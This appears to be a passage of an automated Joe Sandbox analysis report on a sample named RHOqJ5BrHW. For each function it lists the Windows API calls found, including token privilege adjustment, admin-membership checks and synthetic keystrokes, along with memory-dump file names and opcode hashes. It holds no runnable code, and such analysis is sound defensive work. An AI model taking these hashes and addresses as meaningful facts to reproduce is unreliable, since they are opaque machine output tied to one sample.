                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
                                    • GetLastError.KERNEL32 ref: 009BB1BA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                    • String ID:
                                    • API String ID: 1922334811-0
                                    • Opcode ID: 3c4f3e6aba6046706e724e2912c59c18dfd040e5d3551e20c8276346710c4914
                                    • Instruction ID: b4daa20dd0ea285046babcf5214c19476b10762d0db0d31c11e3407d9fca9942
                                    • Opcode Fuzzy Hash: 3c4f3e6aba6046706e724e2912c59c18dfd040e5d3551e20c8276346710c4914
                                    • Instruction Fuzzy Hash: 4B118FB2504205AFE718DF98DD95E6BB7ADEB44720B20852EF45A97250DBB0FC428B60
                                    Function 009C6685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009C66AF
                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009C66EC
                                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009C66F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle
                                    • String ID:
                                    • API String ID: 33631002-0
                                    • Opcode ID: 73f0ab4761488ca81b1adb4ef4754f9bc6447d443c6662f1cee5d5a0ad007e73
                                    • Instruction ID: 10988c69fccdbdf52e9ff978f438bf1f53ba66e9a20b32fb2f00751c26c745fd
                                    • Opcode Fuzzy Hash: 73f0ab4761488ca81b1adb4ef4754f9bc6447d443c6662f1cee5d5a0ad007e73
                                    • Instruction Fuzzy Hash: C311A5B2D00228BEE710CBE8DC45FAFBBBCEB09714F004655F901E7190C2749E0587A2
                                    Function 009C71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009C7223
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009C723A
                                    • FreeSid.ADVAPI32(?), ref: 009C724A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: 06741cde133c1092169eb43fc117ecbc5d491403d963a39219f5abf45e0dc572
                                    • Instruction ID: 17a3399db2023cb72cb470e5c0df09b5d707c40b216617aa73d45f65f459b995
                                    • Opcode Fuzzy Hash: 06741cde133c1092169eb43fc117ecbc5d491403d963a39219f5abf45e0dc572
                                    • Instruction Fuzzy Hash: CAF01D76A0420DBFDF04DFE4DD89EEEBBBCEF08301F104469A606E2191E2709A458B10
                                    Function 009EF689 Relevance: 4.5, APIs: 3, Instructions: 32nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 009EF6AC
                                    • 6F58C5D0.COMCTL32(?,?,?,009FE52B,?,?,?,?,?), ref: 009EF6B8
                                    • NtdllDialogWndProc_W.USER32(?,00000200,?,?,?,?,?,?,?,009FE52B,?,?,?,?,?), ref: 009EF6D5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClientDialogNtdllProc_Screen
                                    • String ID:
                                    • API String ID: 3420055661-0
                                    • Opcode ID: 8bad4b59f1de18569884ea6dd54c920d84e943423f309ac79c9eb379b678fe21
                                    • Instruction ID: a05c18a742badb532acc99a9c459c062ead2be1184024f4216e31f77fc8fa510
                                    • Opcode Fuzzy Hash: 8bad4b59f1de18569884ea6dd54c920d84e943423f309ac79c9eb379b678fe21
                                    • Instruction Fuzzy Hash: A2F01276400218FFEB05CFC5DC09AAEBBB8EF44311F14405AF906A2160D7B1AA52ABA0
                                    Function 0099B385 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                      • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                    • GetParent.USER32(?), ref: 009FE5B2
                                    • NtdllDialogWndProc_W.USER32(?,00000133,?,?,?,?,?,?,?,?,0099B1E8,?,?,?,00000006,?), ref: 009FE62C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogNtdllParentProc_
                                    • String ID:
                                    • API String ID: 314495775-0
                                    • Opcode ID: 72751cb4fb77328f17619d988e4bddcc7148229976ce60d452e5f964e9d3d14d
                                    • Instruction ID: cc20c52ee6c8144dd8b5150ed3458dd8b51a48a1c58592797ef11d9732f0b9ec
                                    • Opcode Fuzzy Hash: 72751cb4fb77328f17619d988e4bddcc7148229976ce60d452e5f964e9d3d14d
                                    • Instruction Fuzzy Hash: B321A538601108AFDF20DB6CAD859B9779AAB4A324F184256F6194B2F1D7389D42D700
                                    Function 009CF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 009CF599
                                    • FindClose.KERNEL32(00000000), ref: 009CF5C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 3f734a59fdf6d7ea300bfb5a7fbf795e3bf698bd4ededb3c7d2df255de4c55a1
                                    • Instruction ID: 39a39b77b87b2eee3a9d5e9cc98696fa3d7093c5fc9b3f6b0a501b577da95f70
                                    • Opcode Fuzzy Hash: 3f734a59fdf6d7ea300bfb5a7fbf795e3bf698bd4ededb3c7d2df255de4c55a1
                                    • Instruction Fuzzy Hash: A21161726006049FDB10EF69D845B2EB7E9FF88324F04895EF9A9D7291DB34E9018B91
                                    Function 009EF2D0 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • NtdllDialogWndProc_W.USER32(?,0000002B,?,?,?,?,?,?,?,009FE44F,?,?,?), ref: 009EF344
                                      • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 009EF32A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                                    • String ID:
                                    • API String ID: 1273190321-0
                                    • Opcode ID: 30f35c21b7c1701be321904c24439d37d5c0be6ef289aa93c7f0e53df75b89f0
                                    • Instruction ID: 3d84c67a3249a1e4d8e30b3ae82830c4375125af293113611a8547ee22e753ce
                                    • Opcode Fuzzy Hash: 30f35c21b7c1701be321904c24439d37d5c0be6ef289aa93c7f0e53df75b89f0
                                    • Instruction Fuzzy Hash: 5101F135201214ABCF22DF55DC94F6A7B6AFBC5360F180525F8150B2E0C732AC43DB50
                                    Function 009CCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009DBE6A,?,?,00000000,?), ref: 009CCEA7
                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009DBE6A,?,?,00000000,?), ref: 009CCEB9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: 3816181c7f93ef39e752d7ffc470ea5ec7336136c25b2c34ac1ffc0ee56b7a60
                                    • Instruction ID: 6128f325551f887e417f8e91178e90a066efd6395ee82e73e8de19d6042cb30a
                                    • Opcode Fuzzy Hash: 3816181c7f93ef39e752d7ffc470ea5ec7336136c25b2c34ac1ffc0ee56b7a60
                                    • Instruction Fuzzy Hash: 2FF0827550022DABDB10ABE4DC49FEA776DFF09351F004169F919D6181D7309A41CBA5
                                    Function 009C411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009C4153
                                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 009C4166
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InputSendkeybd_event
                                    • String ID:
                                    • API String ID: 3536248340-0
                                    • Opcode ID: 294f6b0b76eab17a7069e332349e6b8319321db0a0a31e4616e6e75486383bd7
                                    • Instruction ID: bd5d59ba95451e2493fe37810423b8edbf84839f841a73908dbdb7ee14500821
                                    • Opcode Fuzzy Hash: 294f6b0b76eab17a7069e332349e6b8319321db0a0a31e4616e6e75486383bd7
                                    • Instruction Fuzzy Hash: E1F0677190424DAFDB058FA0CC05BBE7FB4EF10309F04840AF966AA192D77996129FA0
                                    Function 009BAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009BACC0), ref: 009BAB99
                                    • CloseHandle.KERNEL32(?,?,009BACC0), ref: 009BABAB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: e85759df309871ec4c5cd4ce25d60507728af92408440cabaf0c609e7d518519
                                    • Instruction ID: 4dc31a2574cec4d192baa412e2df7f9ae476ff52240420d5d58602a394dd0f56
                                    • Opcode Fuzzy Hash: e85759df309871ec4c5cd4ce25d60507728af92408440cabaf0c609e7d518519
                                    • Instruction Fuzzy Hash: EEE0E672000510AFEB252F94EC05D77BBEDEF44320711C529F45AC1470DB625D91DB51
                                    Function 009EF7C3 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 009EF7CB
                                    • NtdllDialogWndProc_W.USER32(?,00000084,00000000,?,?,009FE4AA,?,?,?,?), ref: 009EF7F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 2d43f2b725db144dd3b2244c9637c3c7d769e11dfb742e9ecc8fe50389642a91
                                    • Instruction ID: d120c6af38db7f44031c96caaf2952b42a35161ae3c5250f5eb58dba8607fe17
                                    • Opcode Fuzzy Hash: 2d43f2b725db144dd3b2244c9637c3c7d769e11dfb742e9ecc8fe50389642a91
                                    • Instruction Fuzzy Hash: 53E0C231104258BBEB154F4ADC1AFBA3F18EB00B50F108526FD5B984E0E7B29892D260
                                    Function 009A81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,009A6DB3,-0000031A,?,?,00000001), ref: 009A81B1
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009A81BA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 8dbbe420953de12883ebe6b345424359c36ca585bf9236879b93545bfd197906
                                    • Instruction ID: 5cb72126c17b0e93250f1ef2b8c15e89fb4d443515664cbb36fe9960e2bbfedc
                                    • Opcode Fuzzy Hash: 8dbbe420953de12883ebe6b345424359c36ca585bf9236879b93545bfd197906
                                    • Instruction Fuzzy Hash: 5BB0923204460CABDB006BE1EC09B587F68EB08752F004010F60D480618B7254138A93
                                    Function 009877B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 1d14c90f1b39ee1955128f06a3eb5d4e172900055fca3be4c0e17e65ec81971f
                                    • Instruction ID: c03ed77c2da85279961b2556371346763924ddcf63df4b67dbeefc967e4d2977
                                    • Opcode Fuzzy Hash: 1d14c90f1b39ee1955128f06a3eb5d4e172900055fca3be4c0e17e65ec81971f
                                    • Instruction Fuzzy Hash: BEA24B71E04219CFDB24DF98C8807ADBBB1FF48314F2585A9E859AB391D7349E81DB90
                                    Function 00993B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Exception@8Throwstd::exception::exception
                                    • String ID: @
                                    • API String ID: 3728558374-2766056989
                                    • Opcode ID: 81344f566d676ab4195a6247992c22d20ea437b5290c98d1222ff5149eab1014
                                    • Instruction ID: 948a8944ae3178231f5524ae66a2d434c057bc8949bfe702cc80ced60a3345ee
                                    • Opcode Fuzzy Hash: 81344f566d676ab4195a6247992c22d20ea437b5290c98d1222ff5149eab1014
                                    • Instruction Fuzzy Hash: 4F72BE74E04209AFDF14DF98C481BBEB7B9EF88300F14C45AE919AB291D735AE45CB91
                                    Function 009AD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5cfccdf394c6449f5d34b98fb1a27e024917d3979da9813098912f2c218df759
                                    • Instruction ID: 4c5b8a1320efacd07c8e7896eebf3436335ea30bcb1d75fca821056b717ab9d9
                                    • Opcode Fuzzy Hash: 5cfccdf394c6449f5d34b98fb1a27e024917d3979da9813098912f2c218df759
                                    • Instruction Fuzzy Hash: F3320521D2AF414DD7239634D822336A29DAFB73D4F15D737F81AB5DAAEB29C4834240
                                    Function 009896C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __itow__swprintf
                                    • String ID:
                                    • API String ID: 674341424-0
                                    • Opcode ID: 191e7f6fc5ceedc2ea3cd970796a4b970a7c3609bc265a7ded474a330713e79d
                                    • Instruction ID: 61403443de726f1121b0f50641a67aab1edee9740cebd8a6cdbcccdd0fcbdfc7
                                    • Opcode Fuzzy Hash: 191e7f6fc5ceedc2ea3cd970796a4b970a7c3609bc265a7ded474a330713e79d
                                    • Instruction Fuzzy Hash: BA2289B16083059FD724EF28C891B6FB7E4AF84314F14891DF99A9B391DB71E944CB82
                                    Function 009B038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 32a849421499b8febdb7c5c2dbc2fc223d0de33c1dfde25308bf849b1a6dd409
                                    • Instruction ID: c3b23f8b786de3f2ba0c9f818b945886c3b882210f45d492f01db4ce4d504a9e
                                    • Opcode Fuzzy Hash: 32a849421499b8febdb7c5c2dbc2fc223d0de33c1dfde25308bf849b1a6dd409
                                    • Instruction Fuzzy Hash: 45B1DF20D2AF518DD623D6B98831336B65CAFFB2D5B91D71BFC1A74D22EB2185834180
                                    Function 009CB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    • __time64.LIBCMT ref: 009CB6DF
                                      • Part of subcall function 009A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBDC3,00000000,?,?,?,?,009CBF70,00000000,?), ref: 009A3453
                                      • Part of subcall function 009A344A: __aulldiv.LIBCMT ref: 009A3473
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
